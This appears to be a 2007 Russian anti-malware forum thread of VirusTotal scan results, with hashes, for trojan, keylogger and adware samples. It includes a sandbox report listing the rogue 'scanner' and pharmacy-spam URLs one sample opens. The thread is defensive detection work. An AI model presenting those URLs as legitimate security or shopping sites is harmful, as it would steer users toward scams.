-
Свежачок :)[QUOTE]AhnLab-V3 2007.7.7.0 07.06.2007 no virus found
[B]AntiVir 7.4.0.39 07.07.2007 HEUR/Crypted[/B]
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.06.2007 no virus found
AVG 7.5.0.476 07.07.2007 no virus found
BitDefender 7.2 07.08.2007 no virus found
[B]CAT-QuickHeal 9.00 07.07.2007 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 07.07.2007 no virus found
DrWeb 4.33 07.07.2007 no virus found
[B]eSafe 7.0.15.0 07.06.2007 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3769 07.07.2007 no virus found
Ewido 4.0 07.07.2007 no virus found
FileAdvisor 1 07.08.2007 no virus found
Fortinet 2.91.0.0 07.08.2007 no virus found
F-Prot 4.3.2.48 07.06.2007 no virus found
F-Secure 6.70.13260.0 07.07.2007 no virus found
Ikarus T3.1.1.8 07.08.2007 no virus found
[B]Kaspersky 4.0.2.24 07.08.2007 Trojan.Win32.Pakes.au[/B]
McAfee 5069 07.06.2007 no virus found
Microsoft 1.2704 07.08.2007 no virus found
NOD32v2 2384 07.08.2007 no virus found
Norman 5.80.02 07.06.2007 no virus found
[B]Panda 9.0.0.4 07.07.2007 Suspicious file[/B]
Sophos 4.19.0 07.06.2007 no virus found
Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.08.2007 no virus found
TheHacker 6.1.6.143 07.05.2007 no virus found
VBA32 3.12.0.2 07.07.2007 no virus found
VirusBuster 4.3.23:9 07.07.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.08.2007 Heuristic.Crypted[/B][/QUOTE]Kaspersky эвристиком семерки (максимальные настройки) тоже не детектил. :(
[size="1"][color="#666686"][B]Добавлено через 1 час 46 минут[/B][/color][/size]
Ещё один архивчик и опять Касперский промолчал :([QUOTE]AhnLab-V3 2007.7.7.0 07.06.2007 no virus found
AntiVir 7.4.0.39 07.07.2007 no virus found
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.06.2007 no virus found
AVG 7.5.0.476 07.07.2007 no virus found
[B]BitDefender 7.2 07.08.2007 Application.Hotkeyshook.A[/B]
[B]CAT-QuickHeal 9.00 07.07.2007 CrackTool.HotHook.dll (Not a Virus)
ClamAV devel-20070416 07.07.2007 Trojan.W32.HotKeysHook.A-2[/B]
DrWeb 4.33 07.07.2007 no virus found
eSafe 7.0.15.0 07.06.2007 no virus found
eTrust-Vet 30.8.3769 07.07.2007 no virus found
Ewido 4.0 07.08.2007 no virus found
FileAdvisor 1 07.08.2007 no virus found
[B]Fortinet 2.91.0.0 07.08.2007 W32/Hotkeys.B!tr
F-Prot 4.3.2.48 07.06.2007 W32/Keylogger.BQ
F-Secure 6.70.13260.0 07.07.2007 W32/HotKeys.A
Ikarus T3.1.1.8 07.08.2007 Win32.KeyLogger.HatKeys[/B]
Kaspersky 4.0.2.24 07.08.2007 no virus found
McAfee 5069 07.06.2007 no virus found
Microsoft 1.2704 07.08.2007 no virus found
[B]NOD32v2 2384 07.08.2007 Win32/Keylogger.HotKeysHook.A[/B]
Norman 5.80.02 07.06.2007 no virus found
[B]Panda 9.0.0.4 07.08.2007 Suspicious file
Sophos 4.19.0 07.06.2007 HotKeys Hook[/B]
Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.08.2007 no virus found
TheHacker 6.1.6.143 07.05.2007 no virus found
[B]VBA32 3.12.0.2 07.07.2007 RiskWare.CrackTool.Win32.HotHook.dll[/B]
VirusBuster 4.3.23:9 07.07.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.08.2007 Riskware.PSW.HotKeys[/B][/QUOTE]
[size="1"][color="#666686"][B]Добавлено через 1 час 12 минут[/B][/color][/size]
Complete scanning result of "test.rar", received in VirusTotal at 07.08.2007, 12:46:09 (CET).
[QUOTE]AhnLab-V3 2007.7.7.0 07.06.2007 no virus found
[B]AntiVir 7.4.0.39 07.07.2007 TR/Agent.8889[/B]
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.06.2007 no virus found
[B]AVG 7.5.0.476 07.07.2007 Downloader.Tibs.5.BO
BitDefender 7.2 07.08.2007 GenPack:Trojan.Downloader.Tibs.GXD
CAT-QuickHeal 9.00 07.07.2007 (Suspicious) - DNAScan[/B]
ClamAV devel-20070416 07.08.2007 no virus found
[B]DrWeb 4.33 07.08.2007 Trojan.Packed.142
eSafe 7.0.15.0 07.06.2007 Win32.Packed.13[/B]
eTrust-Vet 30.8.3769 07.07.2007 no virus found
Ewido 4.0 07.08.2007 no virus found
FileAdvisor 1 07.08.2007 no virus found
[B]Fortinet 2.91.0.0 07.08.2007 Possible_Nucrp.3[/B]
F-Prot 4.3.2.48 07.06.2007 no virus found
[B]F-Secure 6.70.13260.0 07.07.2007 Trojan-Downloader.Win32.Agent.bhp[/B]
[B]Ikarus T3.1.1.8 07.08.2007 Packed.Win32.Tibs.an
Kaspersky 4.0.2.24 07.08.2007 Packed.Win32.Tibs.an
McAfee 5069 07.06.2007 New Win32.g2
Microsoft 1.2704 07.08.2007 TrojanDownloader:Win32/Vxgame
NOD32v2 2384 07.08.2007 Win32/TrojanDownloader.Small.AWA[/B]
Norman 5.80.02 07.06.2007 no virus found
[B]Panda 9.0.0.4 07.08.2007 Suspicious file
Sophos 4.19.0 07.06.2007 Mal/Dorf-C
Sunbelt 2.2.907.0 07.07.2007 Trojan.Vxgame.z
Symantec 10 07.08.2007 Trojan.Packed.13
TheHacker 6.1.6.143 07.05.2007 Trojan/Downloader.Tibs.mq
VBA32 3.12.0.2 07.07.2007 OScope.Worm.GMA.Nuwar
VirusBuster 4.3.23:9 07.07.2007 Trojan.Tibs.Gen!Pac.126
Webwasher-Gateway 6.0.1 07.08.2007 Trojan.Agent.8889[/B][/QUOTE]
[size="1"][color="#666686"][B]Добавлено через 3 часа 37 минут[/B][/color][/size]
Complete scanning result of "SCardDR.rar", received in VirusTotal at 07.08.2007, 16:12:33 (CET).[QUOTE]AhnLab-V3 2007.7.7.0 07.06.2007 no virus found
AntiVir 7.4.0.39 07.08.2007 no virus found
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.08.2007 no virus found
AVG 7.5.0.476 07.07.2007 no virus found
BitDefender 7.2 07.08.2007 no virus found
CAT-QuickHeal 9.00 07.07.2007 no virus found
ClamAV devel-20070416 07.08.2007 no virus found
[B]DrWeb 4.33 07.08.2007 Trojan.MulDrop.7430[/B]
eSafe 7.0.15.0 07.08.2007 no virus found
eTrust-Vet 30.8.3769 07.07.2007 no virus found
Ewido 4.0 07.08.2007 no virus found
FileAdvisor 1 07.08.2007 no virus found
Fortinet 2.91.0.0 07.08.2007 no virus found
F-Prot 4.3.2.48 07.06.2007 no virus found
[B]Ikarus T3.1.1.8 07.08.2007 Virus.VBS.Agent.c
Kaspersky 4.0.2.24 07.08.2007 Virus.VBS.Agent.c
McAfee 5069 07.06.2007 New Script[/B]
Microsoft 1.2704 07.08.2007 no virus found
NOD32v2 2384 07.08.2007 no virus found
Norman 5.80.02 07.06.2007 no virus found
Panda 9.0.0.4 07.08.2007 no virus found
Sophos 4.19.0 07.06.2007 no virus found
Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.08.2007 no virus found
TheHacker 6.1.6.143 07.05.2007 no virus found
VBA32 3.12.0.2 07.07.2007 no virus found
VirusBuster 4.3.23:9 07.07.2007 no virus found
Webwasher-Gateway 6.0.1 07.08.2007 no virus found[/QUOTE]
-
[B]T=10861[/B]
[code]
Complete scanning result of "avz00003.dta", received in VirusTotal at 07.09.2007, 09:49:18 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.7.7.0 07.09.2007 no virus found
[B]AntiVir 7.4.0.39 07.09.2007 TR/Spy.Bzub.B[/B]
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.08.2007 no virus found
AVG 7.5.0.476 07.08.2007 no virus found
BitDefender 7.2 07.09.2007 no virus found
CAT-QuickHeal 9.00 07.07.2007 no virus found
ClamAV devel-20070416 07.09.2007 no virus found
[B]DrWeb 4.33 07.09.2007 Trojan.Spambot.2369[/B]
eSafe 7.0.15.0 07.08.2007 no virus found
eTrust-Vet 30.8.3774 07.09.2007 no virus found
Ewido 4.0 07.08.2007 no virus found
FileAdvisor 1 07.09.2007 no virus found
[B]Fortinet 2.91.0.0 07.09.2007 Cimuz.CM!tr[/B]
F-Prot 4.3.2.48 07.06.2007 no virus found
Ikarus T3.1.1.8 07.09.2007 no virus found
Kaspersky 4.0.2.24 07.09.2007 no virus found
McAfee 5069 07.06.2007 no virus found
[B]Microsoft 1.2704 07.09.2007 Trojan:Win32/Mespam.B[/B]
NOD32v2 2384 07.08.2007 no virus found
Norman 5.80.02 07.06.2007 no virus found
Panda 9.0.0.4 07.08.2007 no virus found
[B]Sophos 4.19.0 07.06.2007 Troj/Cimuz-CM[/B]
[B]Sunbelt 2.2.907.0 07.07.2007 Trojan.Win32/Mespam.B[/B]
Symantec 10 07.09.2007 no virus found
TheHacker 6.1.6.144 07.09.2007 no virus found
VBA32 3.12.0.2 07.08.2007 no virus found
VirusBuster 4.3.23:9 07.08.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.09.2007 Trojan.Spy.Bzub.B[/B]
Aditional Information
File size: 135168 bytes
MD5: b798e9d6a089c4911e424f5efd3cb801
SHA1: 9faed10f39fb76292f7ff8e213862953a58a42e6
[/code]
-
mplete scanning result of "reset5.dll", received in VirusTotal at 07.09.2007, 10:05:37 (CET).
Antivirus Version Update Result
[B]AhnLab-V3 2007.7.7.0 07.09.2007 Win-AppCare/Reseterm.17408[/B]
AntiVir 7.4.0.39 07.09.2007 no virus found
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.08.2007 no virus found
[B]AVG 7.5.0.476 07.08.2007 Downloader.Tibs.5.AK[/B]
BitDefender 7.2 07.09.2007 no virus found
CAT-QuickHeal 9.00 07.07.2007 no virus found
ClamAV devel-20070416 07.09.2007 no virus found
DrWeb 4.33 07.09.2007 no virus found
[B]eSafe 7.0.15.0 07.08.2007 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3774 07.09.2007 no virus found
Ewido 4.0 07.08.2007 no virus found
FileAdvisor 1 07.09.2007 no virus found
Fortinet 2.91.0.0 07.09.2007 no virus found
F-Prot 4.3.2.48 07.06.2007 no virus found
Ikarus T3.1.1.8 07.09.2007 no virus found
Kaspersky 4.0.2.24 07.09.2007 no virus found
McAfee 5069 07.06.2007 no virus found
Microsoft 1.2704 07.09.2007 no virus found
NOD32v2 2384 07.08.2007 no virus found
Norman 5.80.02 07.06.2007 no virus found
Panda 9.0.0.4 07.08.2007 no virus found
[B][U]Sophos 4.19.0 07.06.2007 WPA Reset[/U][/B]
Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.09.2007 no virus found
TheHacker 6.1.6.144 07.09.2007 no virus found
VBA32 3.12.0.2 07.08.2007 no virus found
VirusBuster 4.3.23:9 07.08.2007 no virus found
Webwasher-Gateway 6.0.1 07.09.2007 no virus found
Aditional Information
File size: 17408 bytes
MD5: 4bbb069330b8124085eb38eb4391dcd9
SHA1: 0629ede68f31944e010723f3af5c44debf30834e
packers: PECOMPACT
packers: PECompact
это после рассылки вендорам только Sophos увидел ...
[QUOTE]The sample e-mail you have sent in for analysis does contain viral file(s).
Files detected as App/WPAReset-A , Adware
(Only with Sophos Antivirus Version 6 and above )[/QUOTE]
-
AhnLab-V3 2007.7.7.0 07.09.2007 no virus found
[B]AntiVir 7.4.0.39 07.09.2007 TR/Drop.Sp.102104.B[/B]
Authentium 4.93.8 07.07.2007 no virus found
Avast 4.7.997.0 07.08.2007 no virus found
AVG 7.5.0.476 07.08.2007 no virus found
[B]BitDefender 7.2 07.09.2007 Trojan.Popuper.CA
CAT-QuickHeal 9.00 07.09.2007 TrojanSpy.BZub.ip
ClamAV devel-20070416 07.09.2007 Trojan.Spy-8939
DrWeb 4.33 07.09.2007 Trojan.Popuper[/B]
eSafe 7.0.15.0 07.08.2007 no virus found
eTrust-Vet 30.8.3774 07.09.2007 no virus found
[B]Ewido 4.0 07.09.2007 Logger.BZub.nel[/B]
FileAdvisor 1 07.09.2007 no virus found
Fortinet 2.91.0.0 07.09.2007 no virus found
F-Prot 4.3.2.48 07.06.2007 no virus found
[B]Ikarus T3.1.1.8 07.09.2007 Trojan-Spy.Win32.BZub.ip
Kaspersky 4.0.2.24 07.09.2007 Trojan-Spy.Win32.BZub.ip
McAfee 5069 07.06.2007 Spy-Agent.ba.gen
Microsoft 1.2704 07.09.2007 TrojanDropper:Win32/Small.OT
NOD32v2 2385 07.09.2007 Win32/Spy.BZub.NEL[/B]
Norman 5.80.02 07.06.2007 no virus found
[B]Panda 9.0.0.4 07.09.2007 Trj/Cimuz.FX
Sophos 4.19.0 07.06.2007 Mal/Cimuz-A[/B]
Sunbelt 2.2.907.0 07.07.2007 no virus found
[B]TheHacker 6.1.6.144 07.09.2007 Trojan/Agent.gen
VBA32 3.12.0.2 07.08.2007 Trojan.Popuper[/B]
VirusBuster 4.3.23:9 07.09.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.09.2007 Trojan.Drop.Sp.102104.B[/B]
[size="1"][color="#666686"][B]Добавлено через 6 часов 17 минут[/B][/color][/size]
File "test.rar" received on 07.09.2007 at 23:42:03 (CET) is being scanned by VirusTotal in this moment. Results will be shown as they're generated.
[QUOTE]AhnLab-V3 2007.7.7.0 07.09.2007 no virus found
[B]AntiVir 7.4.0.39 07.09.2007 TR/Agent.aqu[/B]
Authentium 4.93.8 07.09.2007 no virus found
[B]Avast 4.7.997.0 07.09.2007 Win32:Agent-IWR
AVG 7.5.0.476 07.09.2007 Generic5.AZE[/B]
BitDefender 7.2 07.09.2007 no virus found
[B]CAT-QuickHeal 9.00 07.09.2007 Rootkit.Agent.ad[/B]
ClamAV devel-20070416 07.09.2007 no virus found
[B]DrWeb 4.33 07.09.2007 BackDoor.Friend
eSafe 7.0.15.0 07.08.2007 suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3776 07.09.2007 no virus found
Ewido 4.0 07.09.2007 no virus found
FileAdvisor 1 07.09.2007 no virus found
Fortinet 2.91.0.0 07.09.2007 no virus found
F-Prot 4.3.2.48 07.09.2007 no virus found
[B]Ikarus T3.1.1.8 07.09.2007 Trojan.Win32.Agent.aqu
Kaspersky 4.0.2.24 07.09.2007 Trojan.Win32.Agent.aqu[/B]
McAfee 5070 07.09.2007 no virus found
Microsoft 1.2704 07.09.2007 no virus found
[B]NOD32v2 2386 07.09.2007 a variant of Win32/Adware.Virtumonde.O[/B]
Norman 5.80.02 07.09.2007 no virus found
[B]Panda 9.0.0.4 07.09.2007 Spyware/Virtumonde
Sophos 4.19.0 07.06.2007 Virtumundo
Sunbelt 2.2.907.0 07.07.2007 VIPRE.Suspicious[/B]
Symantec 10 07.09.2007 no virus found
[B]TheHacker 6.1.6.144 07.09.2007 Trojan/Agent.aqu
VBA32 3.12.0.2 07.09.2007 BackDoor.Friend[/B]
VirusBuster 4.3.23:9 07.09.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.09.2007 Trojan.Agent.aqu[/B][/QUOTE]
-
Вложений: 1
[B]T=10933[/B]
Complete scanning result of "avz00005.dta", received in VirusTotal at 07.10.2007, 11:10:47 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.7.7.0 07.10.2007 no virus found
[B]AntiVir 7.4.0.39 07.10.2007 HEUR/Malware[/B]
Authentium 4.93.8 07.09.2007 no virus found
Avast 4.7.997.0 07.09.2007 no virus found
AVG 7.5.0.476 07.09.2007 no virus found
[B]BitDefender 7.2 07.10.2007 BehavesLike:Trojan.StartPage[/B]
CAT-QuickHeal 9.00 07.09.2007 no virus found
ClamAV devel-20070416 07.10.2007 no virus found
DrWeb 4.33 07.10.2007 no virus found
eSafe 7.0.15.0 07.08.2007 no virus found
eTrust-Vet 30.8.3777 07.10.2007 no virus found
Ewido 4.0 07.10.2007 no virus found
FileAdvisor 1 07.10.2007 no virus found
Fortinet 2.91.0.0 07.10.2007 no virus found
F-Prot 4.3.2.48 07.09.2007 no virus found
Ikarus T3.1.1.8 07.10.2007 no virus found
[COLOR=Red]Kaspersky 4.0.2.24 07.10.2007 no virus found[/COLOR]
McAfee 5070 07.09.2007 no virus found
Microsoft 1.2704 07.10.2007 no virus found
[B]NOD32v2 2389 07.10.2007 probably unknown NewHeur_PE virus[/B]
[B]Norman 5.80.02 07.09.2007 W32/Malware[/B]
[B]Panda 9.0.0.4 07.10.2007 Suspicious file[/B]
Sophos 4.19.0 07.06.2007 no virus found
Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.10.2007 no virus found
TheHacker 6.1.6.144 07.09.2007 no virus found
VBA32 3.12.0.2 07.09.2007 no virus found
VirusBuster 4.3.23:9 07.09.2007 no virus found
[B]Webwasher-Gateway 6.0.1 07.10.2007 Heuristic.Malware[/B]
Aditional Information
File size: 9216 bytes
MD5: e2902ae694d9cb8f748a5dea022d4cf6
SHA1: fb7e6e37a7a38a1966ef9559e67c80014dc85c9c
norman sandbox: [ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: [EMAIL="[email protected]"][email protected][/EMAIL] - REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* File length: 9216 bytes.
[ Changes to registry ]
* Modifies value "Start Page"="http://scanner.malwarealarm.com/3/?advid=732" in key "HKCUSoftwareMicrosoftInternet ExplorerMain".
[ Network services ]
* Looks for an Internet connection.
[ Process/window information ]
* Attemps to open jlfU%ywfyX .
* Attemps to open [URL]hp://scanner.malwarealarm.com/10/?advid=732[/URL] .
* Attemps to open [URL]hp://go.errorprotector.com/MTUxNzI=/2/5294/ctx=1/in=1/epp=1//[/URL] .
* Attemps to open [URL]hp://go.winantispyware.com/MTM4MDE=/2/5294/ax=1/ed=1/ex=1//[/URL] .
* Attemps to open [URL]hp://scanner.malwarealarm.com/5/?advid=732[/URL] .
* Attemps to open [URL]hp://go.errorsafe.com/MTUxNzE=/2/5294/ax=1/ed=1/ex=1//[/URL] .
* Attemps to open [URL]hp://go.systemdoctor.com/MTM4MDA=/2/5294/ax=1/ed=1/ex=1//[/URL] .
* Attemps to open [URL]hp://go.drivecleaner.com/MTM4MDI=/2/5294/ax=1/ed=1/ex=1//[/URL] .
* Attemps to open [URL]hp://softwarereferral.com/jump.php?wmid=6010&mid=MTY4Ojo=&lid=1[/URL] .
* Attemps to open [URL]hp://go.winantivirus.com/MTM3MTA=/2/5294/ax=1/ed=1/ex=1//[/URL] .
* Attemps to open [URL]hp://softwarereferral.com/jump.php?wmid=6010&mid=MTY4Ojo=&lid=2[/URL] .
* Attemps to open [URL]hp://www.canadianmedsworld.com/?aid=670[/URL] .
* Attemps to open [URL]hp://scanner.malwarealarm.com/8/?advid=732[/URL] .
* Attemps to open [URL]hp://scanner.malwarealarm.com/9/?advid=732[/URL] .
* Attemps to open [URL]hp://www.canadianpharmacyltd.com/?aid=670[/URL] .
* Attemps to open [URL]hp://softwarereferral.com/jump.php?wmid=6010&mid=MTY4Ojo=&lid=7[/URL] .
* Attemps to open [URL]hp://scanner.malwarealarm.com/3/?advid=732[/URL] .
* Attemps to open [URL]hp://scanner.malwarealarm.com/4/?advid=732[/URL] .
люблю я такие примеры ;) 7 касперский с максимальной эвристикой ловит, ещё один реальный пример того,что нужно менять версию каспера на вирустотале. Я уже написал им, но никакого ответа не получил. Пишите тоже, чем больше напишут, тем быстрее заменят.
-
[URL=http://img223.imageshack.us/my.php?image=capture10072007134243tu5.png][IMG]http://img223.imageshack.us/img223/2663/capture10072007134243tu5.th.png[/IMG][/URL]
-
гордо лежал на рабочем столе:
Complete scanning result of "file.exe", received in VirusTotal at 07.10.2007, 12:59:42 (CET).
Antivirus Version Update Result
AhnLab-V3 2007.7.7.0 07.10.2007 no virus found
[B]AntiVir 7.4.0.39 07.10.2007 TR/Crypt.XPACK.Gen[/B]
Authentium 4.93.8 07.09.2007 no virus found
Avast 4.7.997.0 07.09.2007 no virus found
[B]AVG 7.5.0.476 07.09.2007 Generic5.FRJ
BitDefender 7.2 07.10.2007 Trojan.PWS.LdPinch.BSJ
CAT-QuickHeal 9.00 07.09.2007 (Suspicious) - DNAScan
[/B]ClamAV devel-20070416 07.10.2007 no virus found
[B]DrWeb 4.33 07.10.2007 Trojan.PWS.LDPinch.1417
eSafe 7.0.15.0 07.08.2007 Win32.PolyCrypt.b
[/B]eTrust-Vet 30.8.3777 07.10.2007 no virus found
Ewido 4.0 07.10.2007 no virus found
FileAdvisor 1 07.10.2007 no virus found
[B]Fortinet 2.91.0.0 07.10.2007 W32/Basine.B
[/B]F-Prot 4.3.2.48 07.09.2007 no virus found
[B]Ikarus T3.1.1.8 07.10.2007 Packed.Win32.PolyCrypt.b
Kaspersky 4.0.2.24 07.10.2007 Packed.Win32.PolyCrypt.b
[/B]McAfee 5070 07.09.2007 no virus found
[B]Microsoft 1.2704 07.10.2007 Trojan:Win32/Anomaly.gen!A
[/B]NOD32v2 2389 07.10.2007 no virus found
Norman 5.80.02 07.10.2007 no virus found
Panda 9.0.0.4 07.10.2007 no virus found
[B]Sophos 4.19.0 07.06.2007 Mal/Basine-C
[/B]Sunbelt 2.2.907.0 07.07.2007 no virus found
Symantec 10 07.10.2007 no virus found
TheHacker 6.1.6.144 07.09.2007 no virus found
VBA32 3.12.0.2 07.09.2007 no virus found
[B]VirusBuster 4.3.23:9 07.09.2007 Trojan.DR.Cimuz.Gen.1
Webwasher-Gateway 6.0.1 07.10.2007 Trojan.Crypt.XPACK.Gen
[/B]
Aditional Information
File size: 52526 bytes
MD5: df8c8940526488e6080a77e7dbe9b4a4
SHA1: 30daa45fa817aebb2bbb68b1affbe4ff3b0d2016
-
[URL=http://img74.imageshack.us/my.php?image=capture10072007154607yh4.png][IMG]http://img74.imageshack.us/img74/1704/capture10072007154607yh4.th.png[/IMG][/URL]
-
AhnLab-V3 2007.7.11.1 20070711 no virus found
[B]AntiVir 7.4.0.39 20070711 HEUR/Malware[/B]
Authentium 4.93.8 20070710 no virus found
Avast 4.7.997.0 20070711 no virus found
[B]AVG 7.5.0.476 20070710 SHeur.MK[/B]
BitDefender 7.2 20070711 no virus found
CAT-QuickHeal 9.00 20070711 no virus found
ClamAV devel-20070416 20070711 no virus found
DrWeb 4.33 20070711 no virus found
[B]eSafe 7.0.15.0 20070710 suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3779 20070711 no virus found
Ewido 4.0 20070711 no virus found
FileAdvisor 1 20070711 no virus found
Fortinet 2.91.0.0 20070711 no virus found
F-Prot 4.3.2.48 20070710 no virus found
Ikarus T3.1.1.8 20070711 no virus found
Kaspersky 4.0.2.24 20070711 no virus found
McAfee 5071 20070710 no virus found
Microsoft 1.2704 20070711 no virus found
NOD32v2 2392 20070711 no virus found
Norman 5.80.02 20070711 no virus found
Panda 9.0.0.4 20070711 no virus found
Sophos 4.19.0 20070706 no virus found
Sunbelt 2.2.907.0 20070711 no virus found
Symantec 10 20070711 no virus found
TheHacker 6.1.6.144 20070709 no virus found
VBA32 3.12.0.2 20070710 no virus found
VirusBuster 4.3.23:9 20070711 no virus found
[B]Webwasher-Gateway 6.0.1 20070711 Heuristic.Malware[/B]
*************************************************
[size="1"][color="#666686"][B]Добавлено через 35 минут[/B][/color][/size]
AhnLab-V3 2007.7.11.1 20070711 no virus found
[B]AntiVir 7.4.0.39 20070711 TR/DNSChanger.76041[/B]
Authentium 4.93.8 20070710 no virus found
Avast 4.7.997.0 20070711 no virus found
[B]AVG 7.5.0.476 20070710 Downloader.Zlob.DEZ
BitDefender 7.2 20070711 DeepScan:Generic.Zlob.7.41F1B32B[/B]
CAT-QuickHeal 9.00 20070711 no virus found
ClamAV devel-20070416 20070711 no virus found
DrWeb 4.33 20070711 no virus found
[B]eSafe 7.0.15.0 20070710 Win32.Zlob.acn[/B]
eTrust-Vet 30.8.3779 20070711 no virus found
Ewido 4.0 20070711 no virus found
FileAdvisor 1 20070711 no virus found
[B]Fortinet 2.91.0.0 20070711 W32/DNSChanger.JC!tr[/B]
F-Prot 4.3.2.48 20070710 no virus found
[B]Ikarus T3.1.1.8 20070711 Generic.Zlob.7[/B]
Kaspersky 4.0.2.24 20070711 no virus found
McAfee 5071 20070710 no virus found
Microsoft 1.2704 20070711 no virus found
[B]NOD32v2 2393 20070711 Win32/TrojanDownloader.Zlob
Norman 5.80.02 20070711 Zlob.AIZJ
Panda 9.0.0.4 20070711 Adware/XXXAccess[/B]
Sophos 4.19.0 20070706 no virus found
Sunbelt 2.2.907.0 20070711 no virus found
[B]Symantec 10 20070711 Trojan.Zlob[/B]
TheHacker 6.1.6.144 20070709 no virus found
VBA32 3.12.0.2 20070710 no virus found
VirusBuster 4.3.23:9 20070711 no virus found
[B]Webwasher-Gateway 6.0.1 20070711 Trojan.DNSChanger.76041[/B]
-
Тема 11000 Файл rstrui.exe
[QUOTE]AhnLab-V3 2007.7.12.1 2007.07.12 no virus found
AntiVir 7.4.0.39 2007.07.12 no virus found
Authentium 4.93.8 2007.07.12 no virus found
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.12 no virus found
[b]CAT-QuickHeal 9.00 2007.07.12 (Suspicious) - DNAScan [/b]
ClamAV devel-20070416 2007.07.12 no virus found
DrWeb 4.33 2007.07.12 no virus found
eSafe 7.0.15.0 2007.07.10 no virus found
eTrust-Vet 30.8.3781 2007.07.12 no virus found
Ewido 4.0 2007.07.12 no virus found
FileAdvisor 1 2007.07.12 no virus found
Fortinet 2.91.0.0 2007.07.12 no virus found
F-Prot 4.3.2.48 2007.07.11 no virus found
Ikarus T3.1.1.8 2007.07.12 no virus found
Kaspersky 4.0.2.24 2007.07.12 no virus found
McAfee 5072 2007.07.11 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2395 2007.07.12 no virus found
Norman 5.80.02 2007.07.12 no virus found
Panda 9.0.0.4 2007.07.12 no virus found
Sophos 4.19.0 2007.07.06 no virus found
[b]Sunbelt 2.2.907.0 2007.07.12 VIPRE.Suspicious [/b]
Symantec 10 2007.07.12 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.12 no virus found
VirusBuster 4.3.23:9 2007.07.11 no virus found
[b]Webwasher-Gateway 6.0.1 2007.07.12 Win32.Malware.gen (suspicious [/b]
[/QUOTE]
По Симантеку 10.1.4.4000 - w32.virut.j. Поражает exe-файлы.
-
Из темы [url]http://virusinfo.info/showthread.php?t=10996[/url]
По вердикту аналитиков ЛК avz00006.dta - [B]Virus.Win9x.Zom.864[/B][QUOTE]AhnLab-V3 2007.7.13.0 2007.07.12 no virus found
AntiVir 7.4.0.39 2007.07.12 no virus found
Authentium 4.93.8 2007.07.12 no virus found
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.12 no virus found
CAT-QuickHeal 9.00 2007.07.12 no virus found
ClamAV devel-20070416 2007.07.12 no virus found
[B]eSafe 7.0.15.0 2007.07.10 Suspicious Trojan/Worm[/B]
eTrust-Vet 30.8.3781 2007.07.12 no virus found
Ewido 4.0 2007.07.12 no virus found
FileAdvisor 1 2007.07.12 no virus found
Fortinet 2.91.0.0 2007.07.12 no virus found
F-Prot 4.3.2.48 2007.07.11 no virus found
Ikarus T3.1.1.8 2007.07.12 no virus found
[B]Kaspersky 4.0.2.24 2007.07.12 Virus.Win9x.Zom.864
McAfee 5072 2007.07.11 New Malware.aj[/B]
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2395 2007.07.12 no virus found
[B]Norman 5.80.02 2007.07.12 W32/Suspicious_U.gen[/B]
Panda 9.0.0.4 2007.07.12 no virus found
[B]Sophos 4.19.0 2007.07.06 Mal/Packer
Sunbelt 2.2.907.0 2007.07.12 VIPRE.Suspicious[/B]
Symantec 10 2007.07.12 no virus found
TheHacker 6.1.6.145 2007.07.12 no virus found
VBA32 3.12.0.2 2007.07.12 no virus found
VirusBuster 4.3.23:9 2007.07.12
[B]Webwasher-Gateway 6.0.1 2007.07.12 Win32.Malware.gen (suspicious)[/B][/QUOTE]
-
Свежачок из темы [url]http://virusinfo.info/showthread.php?t=10990[/url]
файл [B]blink.dll[/B]
[QUOTE]Antivirus Version Last Update Result
AhnLab-V3 2007.7.13.0 2007.07.12 no virus found
AntiVir 7.4.0.39 2007.07.12 no virus found
Authentium 4.93.8 2007.07.12 no virus found
Avast 4.7.997.0 2007.07.12 no virus found
AVG 7.5.0.476 2007.07.12 no virus found
BitDefender 7.2 2007.07.13 no virus found
CAT-QuickHeal 9.00 2007.07.12 no virus found
ClamAV devel-20070416 2007.07.13 no virus found
[COLOR="Blue"]DrWeb 4.33 2007.07.12 DLOADER.Trojan[/COLOR]
eSafe 7.0.15.0 2007.07.10 no virus found
eTrust-Vet 30.8.3782 2007.07.12 no virus found
Ewido 4.0 2007.07.12 no virus found
FileAdvisor 1 2007.07.13 no virus found
Fortinet 2.91.0.0 2007.07.12 no virus found
F-Prot 4.3.2.48 2007.07.11 no virus found
Ikarus T3.1.1.8 2007.07.12 no virus found
[COLOR="Red"][COLOR="Blue"]Kaspersky 4.0.2.24 2007.07.13 Backdoor.Win32.Agent.aqr[/COLOR][/COLOR]
McAfee 5073 2007.07.12 no virus found
Microsoft 1.2704 2007.07.12 no virus found
NOD32v2 2396 2007.07.12 no virus found
Norman 5.80.02 2007.07.12 no virus found
Panda 9.0.0.4 2007.07.12 Suspicious file
